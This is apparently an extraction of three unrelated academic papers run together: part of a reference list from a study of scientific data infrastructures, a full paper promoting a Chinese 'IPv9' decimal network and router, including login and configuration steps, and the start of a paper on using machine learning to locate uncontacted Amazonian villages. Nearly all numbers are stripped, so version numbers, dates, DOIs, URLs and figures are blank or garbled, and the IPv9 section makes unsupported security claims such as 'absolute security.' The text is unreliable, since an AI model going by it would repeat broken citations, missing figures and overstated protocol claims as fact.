jc, sands ae. . what lies beneath? knowledge infrastructures in the subseafloor biosphere and beyond. in- ternational journal on digital librarie ( ): – doi . /s - - - . darch pt, sands ae. . beyond big or little science: understanding data lifecycles in astronomy and the deep subseafloor biosphere. in: iconference proceedings. newport beach, ca: ischools, available at https://www.ideals.illinois.edu/handle/ / . dark energy survey. . dark energy survey. available at https://www.darkenergysurvey. org/ (accessed on july ). darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http:// . . . /internal/docs/c-debi_sip_ - .pdf http:// . . . /internal/docs/c-debi_sip_ - .pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ _c-debi_activity_workshop_report.pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/ _c-debi_activity_workshop_report.pdf http://cdp.darkenergybiosphere.org http://cdp.darkenergybiosphere.org http://www.darkenergybiosphere.org/wp-content/uploads/docs/c-debi-annual-report- .pdf http://www.darkenergybiosphere.org/wp-content/uploads/docs/c-debi-annual-report- .pdf http://www.darkenergybiosphere.org/research-activities/funded-projects/ http://dx.doi.org/ . / http://www.stccmop.org http://www.stccmop.org http://www.cresis.ku.edu http://www.cresis.ku.edu https://www.ideals.illinois.edu/handle/ / http://www.asis.org/asist /proceedings/submissions/papers/ paper.pdf http://www.asis.org/asist /proceedings/submissions/papers/ paper.pdf http://dx.doi.org/ . /s - - - https://www.ideals.illinois.edu/handle/ / https://www.ideals.illinois.edu/handle/ / https://www.darkenergysurvey.org/ https://www.darkenergysurvey.org/ http://dx.doi.org/ . /peerj-cs. earthscope. . earthscope. available at http://www.earthscope.org/ (accessed on july ). edwards k. . center for dark energy biosphere investigations (c-debi ): a center for resolving the extent, function, dynamics and implications of the subseafloor biosphere. available at http://www.darkenergybiosphere.org/internal/docs/ c- debi _fullproposal.pdf. edwards pn. . a vast machine: computer models, climate data, and the politics of global warming. cambridge: mit press. edwards k, amend j. . towards coordination and integration of deep marine biosphere research: the dark energy biosphere institute (debi). available at https: //www.marum.de/binaries/binary /edwards_deepbiospheredebi.pdf. edwards pn, bowker gc, jackson sj, williams r. . introduction: an agenda for in- frastructure studies. journal of the association for information systems ( ): – . edwards pn, jackson sj, chalmers mk, bowker gc, borgman cl, ribes d, burton m, calvert s. . knowledge infrastructures: intellectual frameworks and research challenges. ann arbor: university of michigan, . edwards pn, mayernik ms, batcheller al, bowker gc, borgman cl. . science friction: data, metadata, and collaboration. social studies of science ( ): – doi . / . european space agency. . gaia. available at http://sci.esa.int/gaia/ (accessed on july ). hagen j. . the statistical frame of mind in systematic biology from quanti- tative zoology to biometry. journal of the history of biology ( ): – doi . /a: . hammersley m, atkinson p. . ethnography: principles in practice. rd edition (reprinted). london: routledge. hey ajg, trefethen a. . the data deluge: an e-science perspective. in: berman f, fox g, hey ajg, eds. grid computing: making the global infrastructure a reality. west sussex: wiley, – . integrated ocean drilling program (iodp) planning sub committee (ipsc) scientific planning working group. . earth, oceans and life: iodp initial science plan. washington, d.c.: international working group support office. iodp. . international ocean discovery program. available at http://iodp.org (accessed on june ). jackson sj, buyuktur a. . who killed waters? mess, method, and forensic explana- tion in the making and unmaking of large-scale science networks. science, technology & human value ( ): – doi . / . kay le. . who wrote the book of life? a history of the genetic code. stanford: stanford university press. keller ef. . a feeling for the organism, th aniversary edition: the life and work of barbara mcclintock. london: macmillan. kelty cm. . this is not an article: model organism newsletters and the question of open science. biosocieties ( ): – doi . /biosoc. . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.earthscope.org/ http://www.darkenergybiosphere.org/internal/docs/ c-debi _fullproposal.pdf http://www.darkenergybiosphere.org/internal/docs/ c-debi _fullproposal.pdf https://www.marum.de/binaries/binary /edwards_deepbiospheredebi.pdf https://www.marum.de/binaries/binary /edwards_deepbiospheredebi.pdf http://dx.doi.org/ . / http://sci.esa.int/gaia/ http://dx.doi.org/ . /a: http://iodp.org http://dx.doi.org/ . / http://dx.doi.org/ . /biosoc. http://dx.doi.org/ . /peerj-cs. kitchin r. . big data, new epistemologies and paradigm shifts. big data & society ( ): doi . / . kitchin r, lauriault tp. . small data, data infrastructures and big data. ssrn electronic journal doi . /ssrn. . kragh h. . cosmology and controversy: the historical development of two theories of the universe. princeton: princeton university press. lenoir t. . shaping biomedicine as an information science. in: mary eb, trudi bh, robert vw, eds. proceedings of the conference on the history and heritage of science information systems. medford: information today, inc, – . lenoir t, hays m. . manhattan project for biomedicine. in: controlling our destinies: historical, philosophical, ethical, and theological perspectives on the human genome project. south bend indiana: university of notre dame press, – . leonelli s. . documenting the emergence of bio-ontologies: or, why research- ing bioinformatics requires hpssb. history and philosophy of the life sciences ( ): – . leonelli s. . when humans are the exception: cross-species databases at the interface of biological and clinical research. social studies of science ( ): – doi . / . leonelli s. . what difference does quantity make? on the epistemology of big data in biology. big data & society ( ): doi . / . leonelli s, ankeny ra. . re-thinking organisms: the impact of databases on model organism biology. studies in history and philosophy of science part c: studies in history and philosophy of biological and biomedical sciences ( ): – doi . /j.shpsc. . . . lsst science collaboration, abell pa, allison j, anderson sf, andrew jr, angel jrp, armus l, arnett d, asztalos sj, axelrod ts, bailey s, ballantyne dr, bankert jr, barkhouse wa, barr jd, barrientos lf, barth aj, bartlett jg, becker ac, becla j, beers tc, bernstein jp, biswas r, blanton mr, bloom js, bochanski jj, boeshaar p, borne kd, bradac m, brandt wn, bridge cr, brown me, brunner rj, bullock js, burgasser aj, burge jh, burke dl, cargile pa, chandrasekharan s, chartas g, chesley sr, chu y-h, cinabro d, claire mw, claver cf, clowe d, connolly aj, cook kh, cooke j, cooray a, covey kr, culliton cs, de jong r, de vries wh, debattista vp, delgado f, dell’antonio ip, dhital s, di stefano r, dickinson m, dilday b, djorgovski sg, dobler g, donalek c, dubois-felsmann g, durech j, eliasdottir a, eracleous m, eyer l, falco ee, fan x, fassnacht cd, ferguson hc, fernandez yr, fields bd, finkbeiner d, figueroa ee, fox db, francke h, frank js, frieman j, fromenteau s, furqan m, galaz g, gal-yam a, garnavich p, gawiser e, geary j, gee p, gibson rr, gilmore k, grace ea, green rf, gressler wj, grillmair cj, habib s, haggerty js, hamuy m, harris aw, hawley sl, heavens af, hebb l, henry tj, hileman e, hilton ej, hoadley k, holberg jb, holman mj, howell sb, infante l, ivezic z, jacoby sh, jain b, jedicke r, jee mj, jernigan jg, jha sw, johnston kv, jones rl, juric m, kaasalainen m, darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /ssrn. http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j.shpsc. . . http://dx.doi.org/ . /peerj-cs. kafka ss, kahn sm, kaib na, kalirai j, kantor j, kasliwal mm, keeton cr, kessler r, knezevic z, kowalski a, krabbendam vl, krughoff ks, kulkarni s, kuhlman s, lacy m, lepine s, liang m, lien a, lira p, long ks, lorenz s, lotz jm, lupton rh, lutz j, macri lm, mahabal aa, mandelbaum r, marshall p, may m, mcgehee pm, meadows bt, meert a, milani a, miller cj, miller m, mills d, minniti d, monet d, mukadam as, nakar e, neill dr, newman ja, nikolaev s, nordby m, o’connor p, oguri m, oliver j, olivier ss, olsen jk, olsen k, olszewski ew, oluseyi h, padilla nd, parker a, pepper j, peterson jr, petry c, pinto pa, pizagno jl, popescu b, prsa a, radcka v, raddick mj, rasmussen a, rau a, rho j, rhoads je, richards gt, ridgway st, robertson be, roskar r, saha a, sarajedini a, scannapieco e, schalk t, schindler r, schmidt s, schmidt s, schneider dp, zhan h, et al. . lsst science book, version . . arxiv preprint. arxiv: . . meyer et. . moving from small science to big science: social and organizational impediments to large scale data sharing (ssrn scholarly paper no. id ). rochester: social science research network. mukerji c. . a fragile power: scientists and the state. princeton: princeton university press. national science foundation. . nsf data management plans. washington, d.c.: national science foundation. noaa. . national oceanic and atmospheric administration. available at http: //www.noaa.gov (accessed on july ). o’donoghue t, punch k (eds.) . qualitative educational research in action: doing and reflecting. abingdon: routledgefalmer. orcutt bn, larowe de, biddle jf, colwell fs, glazer bt, reese bk, kirkpatrick jb, lapham ll, mills hj, sylvan jb, wankel sd, wheat cg. . microbial activity in the marine deep biosphere: progress and prospects. frontiers in microbiology : article doi . /fmicb. . . ortega c. . argos capabilities for global ocean monitoring. in: dahlin h, flem- ming nc, nittis k, petersson se, eds. building the european capacity in operational oceanography: proceedings of the third international conference on eurogoos. amsterdam: elsevier, – . paul nw. . rationalitäten der wissenproduktion: Über transformatio- nen von gegenständen, technologien und information in biomedizin und lebenswissenschaften. berichte zur wissenschaftsgeschichte ( ): – doi . /bewi. . porter tm. . trust in numbers: the pursuit of objectivity in science and public life. princeton: princeton university press. ribes d. . ethnography of scaling, or, how to a fit a national research infrastructure in the room. in: proceedings of the th acm conference on computer supported cooperative work & social computing. new york: acm, – . available at http: //dl.acm.org/citation.cfm?id= . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://www.noaa.gov http://www.noaa.gov http://dx.doi.org/ . /fmicb. . http://dx.doi.org/ . /bewi. http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dx.doi.org/ . /peerj-cs. ribes d, bowker gc. . organizing for multidisciplinary collaboration: the case of the geosciences network. in: olson gm, zimmerman as, bos n, eds. science on the internet. cambridge: mit press, – . ribes d, finholt ta. . representing community: knowing users in the face of changing constituencies. in: proceedings of the acm conference on computer supported cooperative work. new york: acm, – . ribes d, polk jb. . organizing for ontological change: the kernel of an aids research infrastructure. social studies of science ( ): – doi . / . sawyer s. . data wealth, data poverty, science and cyberinfrastructure. prometheus ( ): – doi . / . sloan digital sky survey: home. . available at http://www.sdss.org/ (accessed on november ). southern california earthquake center. . southern california earthquake center |studying earthquakes and their effects in california and beyond. available at https://www.scec.org/ (accessed on july ). star sl. . the ethnography of infrastructure. american behavioral scientist ( ): – doi . / . star sl, ruhleder k. . steps toward an ecology of infrastructure: design and access for large information spaces. information systems research ( ): – doi . /isre. . . . strauss ma. . mapping the universe: surveys of the sky as discovery engines in astronomy. daedalus ( ): – doi . /daed_a_ . suárez-díaz e, anaya-munoz vh. . history, objectivity, and the construction of molecular phylogenies. studies in history and philosophy of science part c: studies in history and philosophy of biological and biomedical science ( ): – . teske a, biddle jf, schrenk m. . workshop: deep biosphere sediment microbiol- ogy. available at http://www.darkenergybiosphere.org/rcn/meetings/ meeting/ docs/ debi_sedi mentmeetingsummary .pdf . unols. . university-national oceanographic laboratory services. available at https://www.unols.org/ (accessed on july ). whitman wb, coleman dc, wiebe wj. . prokaryotes: the unseen majority. proceedings of the national academy of sciences of the united states of america ( ): . darch and borgman ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . / http://www.sdss.org/ https://www.scec.org/ http://dx.doi.org/ . / http://dx.doi.org/ . /isre. . . http://dx.doi.org/ . /daed_a_ http://www.darkenergybiosphere.org/rcn/meetings/ meeting/docs/ debi_sedi mentmeetingsummary .pdf http://www.darkenergybiosphere.org/rcn/meetings/ meeting/docs/ debi_sedi mentmeetingsummary .pdf https://www.unols.org/ http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research and implementation of future network router sun huai . school of computer science and engineering xi'an technological university xi'an, , china . state and provincial joint engineering lab. of advanced network, monitoring and control xi'an, china e-mail: sh @ .com wang zhongsheng . school of computer science and engineering xi'an technological university xi'an, , china . state and provincial joint engineering lab. of advanced network, monitoring and control xi'an, china e-mail: wzhsh @ .com abstract—this paper summarizes the process and characteristics of ipv , and introduces the digital domain name system, route management and security. the tunneling and dual protocol stack technologies are described. both the transition from ipv to ipv and from ipv to ipv will be based on mature network conversion services that support protocol compatibility. the ipv router is currently available in two models, -megabit and gigabit. both routers have good ability to meet the network needs of ipv . the film transmission system of beijing university of posts and telecommunications uses ipv and g technology, which is a relatively advanced transmission application of ipv at present. it summarizes the convenience and security brought by the new network address, and provides a new idea for the development of the network. keywords-future network; router; network transformation i. the new network ipv internet protocol (ip) is a communication protocol designed for computers to communicate with each other in the network. ip provides a common rule for computers to access the internet. the internet has become the largest open network in the world. with the rapid development of the global economy, the advancement of communication technology and network technology, the penetration rate of computers and mobile terminals is getting higher and higher. the problems with ipv are also exposed. for example, in the address space, performance, network security and routing bottlenecks, ipv makes it difficult to meet the needs of the internet in the future. to solve the ipv many problems, ipv , ipv and other internet protocols have been born. a. the production of ipv the new network covers three new technologies: address coding design, new addressing mechanism and new address architecture design[ ]. it aims to build a core technology system based on the underlying ip network. on this basis, a new framework can be formed. connected and compatible with a network system that covers existing networks (internet with ipv and ipv technologies). us government agency has the authority of the professional and technical confirmation from the law, my country has ip framework with the united states internet network to the prior art, proprietary technology core network sovereignty. this is the patented technology of ipv (method of using whole digital code to assign address for computer). the official patent name is “the method of allocating addresses to computers using full digital coding”. international journal of advanced network, monitoring and controls volume , no. , the ipv protocol refers to the - arabic digital network as the virtual ip address, and uses decimal as the text representation method, which is a convenient way to find online users[ ]. in order to improve efficiency and facilitate end users, some of the addresses can be directly used for domain name. at the same time, it is also called “new generation security and reliable information integrated network protocol”. it uses the classification and coding of the original computer network, cable radio and television network and telecommunication network. b. the characteristics of ipv by using ipv routers, clients, protocol conversion routers and other devices to build a pure ipv network, ipv /ipv hybrid network to achieve a new generation of internet systems with independent and secure intellectual property rights. including the domestically controllable ipv future network root domain name system, promote technology convergence, service integration, data convergence, and achieve cross-level, cross-regional, cross-system, cross-department, cross-business collaborative management and services. with the data concentration and sharing as the way, we will build a national integrated national big data center, accelerate the promotion of domestically-controlled independent control alternative plans, and build a safe and controllable information technology system. in the existing tcp/ip protocol, conventional packet switching cannot support true real-time applications and circuit switching, and supports applications such as transmitting sound or images in circuits in a four-layer protocol. with the demand for voice, image and data triple play, the incompatibility of human-machine interface and the environmental protection requirements for redundant links, especially the original security mechanism is unreasonable, it is imperative to establish a new network theory foundation. so in , china established the decimal network standard working group to study and implement security-based first-come-authentication communication rules, address encryption, as short as bits up to bits of address space, resource reservation, virtual real circuit the communication network transmission mode, such as character direct addressing and three-layer four-layer hybrid network architecture. the existing tcp/ip protocol is a unreliable packet protocol with a maximum packet length of bytes. the tcp/ip/m protocol of ipv , which is led by china, not only inherits the unreliable packet protocol of the existing tcp/ip protocol, but also develops absolute code stream and long stream code[ ]. the data packet can reach tens of megabytes or more. after three can be transmitted directly by telephone and cable television data link is established without affecting the existing transmission network until four transmission new transmission theory until they have finished the removal of three of four transport protocol. ) digital domain name system in the digital domain name system, ipv and ipv are domain name resolutions through the united states, while ipv is set by countries, which avoids the limitation of ip addresses and reduces the use of domain names by the state[ ]. ipv is a "decimal network" with independent intellectual property rights developed according to the invention patent "method of allocating addresses for computers using all digital encoding". its decimal network introduces a digital domain name system, which can be used to convert the original binary through a decimal network. the address is converted into decimal text, allowing the computers on the network to connect to each other, to communicate and transmit data to each other, and to be compatible with chinese and english domain names. the digital domain name technology used by the ipv decimal network reduces the difficulty of network management, the vast address space and the newly added security mechanism, and solves many problems faced by the existing ipv . the advantages of international journal of advanced network, monitoring and controls volume , no. , other aspects can also meet the different levels of demand for various devices in the future. ) routing in terms of routing, the increase in the size of the internet has caused the ipv routing table to swell, making the efficiency of network routing declining. the emergence of ipv solves this problem, and the optimization of routing improves the efficiency of the network. ipv establishes an ipv tunnel between the mobile unit and the proxy , and then relays the data packet sent to the mobile unit's home address received by the “proxy” used as the mobile unit to the current location of the mobile unit through the tunnel, thereby implementing network terminal mobility support. ipv has a smaller routing table than ipv . ipv addresses are assigned according to the clustering principle, which enables the router to represent a piece of network with one record in the table, reduces the length of routing table in the router, and improves the speed of forwarding packets from the routing table. the address allocation of ipv follows the principle of spatial clustering, which enables the ipv router to represent a national network and an application network with one record, greatly reducing the length of routing table in the router and improving the speed of forwarding packets by routing table. at the same time, this network can express a specific geographical location[ ]. according to this logic, only one route is needed between countries. for example, the route to china is . the ipv routing table is large and irregular, and the ipv routing table is smaller than the ipv routing table, but the ipv routing table contains no geographic information and the routing is messy. ) security ipv encryption technology and authentication technology have significantly improved than ipv , and the encryption technology proposed by ipv is difficult to decipher at the physical level, and the confidential performance has been significantly improved. however, at the level of network information security, there are still many factors that cause insecure network information in china. the fundamental reason is that the root servers of ipv and ipv are in the united states. many patents related to the network are in the hands of the united states. at the same time, the risk of information exposure may also be introduced. the ipv is to have independent intellectual property rights of internet protocol, can bring a lot of protection to the information security of the country[ ]. ipv ’s address space enables end-to-end secure transmission, making it possible for people to use devices to directly assign addresses. both ipv and ipv do not have the concept of national geographic location. most of their domain name resolution servers are in the united states, and ipv proposes the concept of “sovereign equality”, which enables each country to have its own root domain name system. ii. introduction to network access technology ipv has a huge ip address resource space, which not only completely solves the current situation of ipv address resource shortage, but also far superior to ipv network in terms of the number of ip addresses it can use. due to the large scale of the current ipv protocol, no matter which protocol is in use, it is impossible to fully replace ipv in a short period of time. it must go through a cyclic and gradual replacement process. therefore, the problem of transition mechanism should be considered. in order to successfully complete the process of ipv protocol replacing ipv protocol, the first consideration is to deal with the relationship between the existing ipv network and the future ipv network. the problem to be solved is how to achieve a smooth transition of ipv network, so that it can solve the problem of ip address shortage in a short time. in fact, the solution of the transition mechanism problem can promote the application of ipv , which is of great international journal of advanced network, monitoring and controls volume , no. , significance to whether it can become the next generation internet protocol or just a lan protocol. a. tunnel technology tunneling technology is a technology that converts the data gram in ipv format into the data gram in ipv format and finally transmits it in the routing system of ipv network. a tunnel has a tunnel entrance and a tunnel exit[ ]. there is only one tunnel entrance and one tunnel exit. first, at the tunnel entrance, the ipv data gram is transformed and processed, and the data information is parsed and encapsulated into a data gram in ipv format. the processed data gram is then transmitted along the virtual link identified by the tunnel marker. when the data gram arrives at the exit of the tunnel, it is handed over to the ipv protocol. according to the corresponding protocol, the data gram is processed, along with the field value, which is the value of the next header field of the article. after the processing, if the tunnel protocol value can still be detected, the ipv header will be discarded and the data gram will be unsealed to obtain the destination address in the original ipv message, and then the message will be sent to the original address according to the destination address. at the same time, the transmitted data gram is processed using the ipv protocol. during the transition from ipv to ipv , tunneling enabled ipv node communication by using existing ipv networks. figure is a schematic diagram of ipv data gram encapsulation. ipv data header unpack ipv date header ipv date header package payload payload figure . schematic diagram of ipv data gram packaging b. double stack technique dual stack refers to the fact that a single node supports both ipv and ipv protocol stacks at the same time. such a node can directly communicate with ipv nodes based on ipv protocol, or with ipv nodes based on ipv protocol. therefore, it can serve as a connection point between ipv network and ipv network, and such a node is ipv /ipv node mentioned earlier. since the new ipv protocol stack is mainly aimed at the original ipv protocol stack network layer part of the major changes, for the transport layer and other layers above the basic changes, ipv /ipv nodes are usually implemented using a double ip layer structure. this is shown in figure . application layer protocol tcp/udp protocol ipv protocol ipv protocol network interface layer protocol figure . double ip layer structure diagram for the router, however, because of the large changes have taken place in ip protocol, and ip routing protocol that is close to the corresponding changes have taken place goes, so "double stack" router is refers to in a router equipment maintenance able and ipv two routines by the protocol stack, so that half of the router can also can communicate with host able with ipv hosts, respectively support independent able and ipv routing protocol, ipv and able routing information routing protocols to calculate, according to their different routing table maintenance. the routing table obtained by ipv data gram is forwarded according to the routing protocol of ipv , and the routing table obtained by ipv data gram is forwarded according to the routing protocol of ipv . the router protocol structure that supports ipv and ipv dual protocol stacks is shown in figure . rip bgp ripng bgp + tcp/udp protocol ipv protocol ipv protocol physical network figure . protocol structure of dual stack router international journal of advanced network, monitoring and controls volume , no. , the network using the dual-stack technology does not have the problem of inter working, so it has certain convenience. however, it needs to assign an ipv address to each ipv node, which will lead to the problem of ipv address resource strain. in addition, every ipv /ipv nodes to run at the same time ipv and able two kinds of protocol stack, at the same time save two sets of command set, at the same time calculation, maintenance and storage of two list items, for gateway device also need to two message transformation and encapsulation protocol stack, this undoubtedly and increase the load of each node, higher demands on the performance of these nodes. in addition, dns servers must support the mapping of host domain names to ipv addresses on a dual-stack network. iii. introduction to ipv routing equipment with the expansion of the new generation internet routing system in china, the new generation internet routing system has been deployed in beijing, shanghai, chongqing, northeast china, sichuan, xinjiang, shandong, guangdong, zhejiang, hong kong, macao and other places. manual configuration of address and route has not been able to meet the current development form, in the configuration, inefficient, complex and other defects have been gradually exposed. in order to cope with the huge routing node management and configuration, an efficient and automated configuration system is needed to handle the allocation and configuration management of the new generation of internet addresses. a. -megabit router the whole machine of the megabit router is shown in figure , including two signal antennas and the main body of the machine. figure . whole figure the panel on the gigabit router is shown in figure . the panel includes network connection indicator light, wifi signal light, usb connection signal light and power signal light. figure . panel figure the warning light of the gigabit router is as follows. when the red light of the power indicator is on, the power supply is normal. when the blue light of wan indicator flashes, wan is normal. the blue light of the lan indicator flashes when the lan is normal. when the blue light of wifi indicator flashes, wifi is normal; usb is normal when the blue light of usb indicator flashes. the prompt light diagram is shown in table . international journal of advanced network, monitoring and controls volume , no. , the front panel is shown in figure . the front panel has usb interface and tf card slot. usb interface can be used to connect usb mouse, keyboard, usb disk and other devices. the tf card slot is used to insert the tf card. table i. lights table indicator light description features power supply red light on : normal wan blue light flashing : normal lan blue light flashing : normal wifi blue light flashing : normal usb blue light flashing : normal figure . front panel figure the back panel is shown in the figure . the back panel has a dc port, which is used to connect the power supply to the router. note that using a mismatched power supply can cause damage to the router. the reset button is the restore button. press to restart the device. long press for about seconds to restore the device to the factory default settings. when the system status indicator changes from slow flicker to fast flicker, it means that the router has successfully resumed the factory setting. at this time, release the reset button and the router will restart. the wan port is the wan port jack. this port is used to connect ethernet cables. lan , lan , lan and lan ports are: lan port jack. this port is used to connect to a hub, switch, or computer with a network card installed on the lan. figure . back panel b. gigabit router the gigabit router's whole machine is shown in the figure , including six signal antennas and the main body of the machine. the six signal antennas include four . g antennas and two g antennas. international journal of advanced network, monitoring and controls volume , no. , figure . whole figure the front panel is shown in the figure , and the back panel has a power port, which is used to connect the power supply to power the router. note that using a mismatched power supply can cause damage to the router. the reset button is the restore button. press to restart the device. long press for about seconds to restore the device to the factory default settings. when the system status indicator changes from slow flicker to fast flicker, it means that the router has successfully resumed the factory setting. at this time, release the reset button and the router will restart. the wan port is the wan port jack. this port is used to connect ethernet cables. lan , lan , lan and lan ports are: lan port jack. this port is used to connect to a hub, switch, or computer with a network card installed on the lan. usb interface can be used to connect usb mouse, keyboard, usb disk and other devices. the tf card slot is used to insert the tf card. iv. ipv routing setup procedures and methods a. login router configuration interface enter . . . in the browser address bar as shown in the browser login interface below, and press enter to enter the system login interface as shown in figure . enter the default user name root and the default password shsjzwlxxkjyxgs in the system login interface as shown in figure . click the login button and you will see the overview interface as shown in figure . figure . front panel figure figure . browser login international journal of advanced network, monitoring and controls volume , no. , figure . system login interface figure . ipv overview interface b. ipv user registration users who use the system for the first time should register before using the router function. user registration is shown in figure .the user types are divided into individuals and enterprises. after the personal router registers the device, the address is automatically assigned without manual allocation. the enterprise router manually assigns the address, and one enterprise account can register multiple devices. before international journal of advanced network, monitoring and controls volume , no. , you register, you need to send the sms verification code and enter the sms verification code. ) click the menu ipv drop-down key to select the user registration function. ) enter the user name, password, confirmation password, registration type, real name, certificate type, certificate number, e-mail, mobile phone, enterprise name, address, postal code and remarks according to the text prompt of user registration. ) enter your phone number and click the send button on the right. ) after the phone receives the verification code, fill in the verification code. ) click the user registration button below. figure . ipv overview interface c. equipment registration when the individual user registers the device, not only the device information is registered, but also the ipv /ipv address is automatically assigned to the device, while the enterprise user only registers the device information. the device registration is shown in figure . ) click the menu ipv drop-down button to select the device registration function. ) choose your city. international journal of advanced network, monitoring and controls volume , no. , ) click the device registration button below. d. configuration of wifi click the network to select wifi and enter the wifi configuration interface. in figure , you can see the working state of wifi. if you need to modify the configuration of wifi, click modify. modify the name of wifi as shown in figure . figure . ipv user device registration figure . configuration of wifi international journal of advanced network, monitoring and controls volume , no. , figure . ipv user device registration configure the device wifi encryption method. generally, it is recommended to use the encryption mode shown(wpa_psk/wpa -psk mixed mode) above to enter the new password and click "save & apply" button. this is the normal router setup, after which a new router is configured. the encryption configuration is shown in figure . figure . encryption configuration international journal of advanced network, monitoring and controls volume , no. , v. ipv and g movie transmission system able movie network issuance application of beijing unicom g network and china mobile company in suzhou g network has already passed the beijing university of posts and telecommunications able fiber routing backbone nodes and able backbone fiber optic cable connected directly across the country, and on may , , the first in the world at mbps end-to-end to mbps speed, in local access able the national backbone network, successfully carried out the digital film distribution network (each film data capacity in hundreds of gb or so). the national online distribution of chinese films was the first in the world to enter the new era of "one hour", and the intelligent cinema based on ipv address was realized. the ipv /ipv router is a dual protocol stack router. by building this dual protocol stack router, the ipv network can be realized and the ipv network can be compatible with ipv , thus achieving a good transition from ipv to ipv . through the configuration of different interfaces of routers, the conversion between different protocols can be realized to realize the data transmission of pure ipv protocol packet, ipv over ipv and ipv over ipv , while ipv over ipv and ipv over ipv are realized by tunnel technology, which is an important way to realize the intercommunication between ipv and ipv networks. a. ipv private network transmission figure shows the transmission of pure ipv private network. an ipv and ipv router is directly set up in the state administration of film and the cinema, which is connected through the ipv private network. the router interface is configured as the ipv transmission mode, so the line between the state administration of film and the cinema is the pure ipv protocol transmission. the network between the two is full of ipv protocol packets, which can guarantee absolute security. figure . ipv private network transmission b. ipv private network tunnel transmission ipv over ipv , ipv /ipv router can be compatible with ipv network, namely ipv packets can be transmitted on the able private network, realize the ipv over able, to design a scheme of transmission as shown in figure . both ends set up double protocol stack router, the router for private network between. the advantage is the backbone adopts able transmission protocol, security can get reliable guarantee. international journal of advanced network, monitoring and controls volume , no. , figure . private network tunnel transmission the transmission process of ipv based ipv packets is as follows: ) router i received ipv packets from the ipv network. ) router encapsulates ipv packets in ipv message. the source address and destination address of ipv message correspond to the entrance address and exit address of the tunnel respectively, that is, the ipv address of router and router . ) the encapsulated ipv packets are transmitted along and through the marked tunnel link, routed to the ipv address, and arrive at the destination router to complete the transmission of ipv private network line. ) router receives the ipv packet from router , unseals the ipv packet to obtain the original ipv packet, and then sends it out. vi. conclusion with the development of the internet and the increasing number of internet users, the shortage of ip address resources has become a bottleneck restricting its development. the application of ipv is spreading in china, especially in the government, banks and other sectors. ipv has a large address capacity, is compatible with ipv and ipv , and uses special encryption mechanisms to make the network environment more secure. this paper discusses the ipv address architecture and the digital domain name system, discusses the different network access technologies in detail, introduces the megabit and gigabit routers that support the use of new networks, and discusses the configuration methods of routers in detail. this paper analyzes the film transmission system of beijing university of posts and telecommunications at the network level, which is very important for the future deployment of ipv network. reference [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] v. fuller, t. li,network working group. classless inter-domain routing (cidr): an address assignment and aggregation strategy, rfc- , . . [ ] kohler e, li j, paxson v, et al. observed structure of addresses in ip traffic [j]. ieee/acm transactions on networking, , ( ): - . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] xie jianping etc. digital domain name specification, sj/t - , . . [ ] m. crawford. network working group.transmission of ipv packets over ethernet networks.rfc- , . . submitted october accepted december published january corresponding author robert s. walker, walkerro@missouri.edu academic editor barbara pes additional information and declarations can be found on page doi . /peerj-cs. copyright walker and hamilton distributed under creative commons cc-by . open access machine learning with remote sensing data to locate uncontacted indigenous villages in amazonia robert s. walker and marcus j. hamilton , department of anthropology, university of missouri, columbia, mo, usa department of anthropology, university of texas at san antonio, san antonio, tx, usa santa fe institute, santa fe, nm, usa abstract background. the world’s last uncontacted indigenous societies in amazonia have only intermittent and often hostile interactions with the outside world. knowledge of their locations is essential for urgent protection efforts, but their extreme isolation, small populations, and semi-nomadic lifestyles make this a challenging task. methods. remote sensing technology with landsat satellite sensors is a non-invasive methodology to track isolated indigenous populations through time. however, the small-scale nature of the deforestation signature left by uncontacted populations clear- ing villages and gardens has similarities to those made by contacted indigenous villages. both contacted and uncontacted indigenous populations often live in proximity to one another making it difficult to distinguish the two in satellite imagery. here we use machine learning techniques applied to remote sensing data with a training dataset of contacted and uncontacted villages. results. uncontacted villages generally have smaller cleared areas, reside at higher elevations, and are farther from populated places and satellite-detected lights at night. a random forest algorithm with an optimally-tuned detection cutoff has a leave- one-out cross-validated sensitivity and specificity of over %. a grid search around known uncontacted villages led us to identify three previously-unknown villages using predictions from the random forest model. our efforts can improve policies toward isolated populations by providing better near real-time knowledge of their locations and movements in relation to encroaching loggers, settlers, and other external threats to their survival. subjects data mining and machine learning, spatial and geographic information systems keywords random forest, satellite imagery, south america, indigenous societies introduction the ongoing colonization of amazonia has brought waves of epidemics and violence for centuries with severe consequences for indigenous populations (bodard, ; hemming, ; hurtado et al., ; hamilton, walker & kesler, ). amazingly, despite all the external pressures, remote areas in the upper amazon watershed still support a number of remnant indigenous societies generally referred to as uncontacted or isolated populations (vaz, ; castillo, ; ricardo & ricardo, ). despite these labels, intermittent and often hostile interactions with the outside world are commonplace (wallace, ). most how to cite this article walker rs, hamilton mj. . machine learning with remote sensing data to locate uncontacted indigenous vil- lages in amazonia. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:walkerro@missouri.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. governmental and non-governmental organizations promote no-contact policies for these isolated indigenous populations with the belief that they are safest if left to themselves (walker & hill, ). however, encroachment from loggers, miners, settlers, and others is incessant and uncontacted societies represent the world’s most critically endangered cultures (walker, kesler & hill, ). there is a need for good information on their locations and movements in hopes of improving their survival prospects moving forward. our project is part of a longitudinal remote surveillance program to conduct scientific studies of indigenous demography and spatial ecology to facilitate informed decisions by policy makers that will increase protection efforts for isolated indigenous populations (walker & hamilton, ; 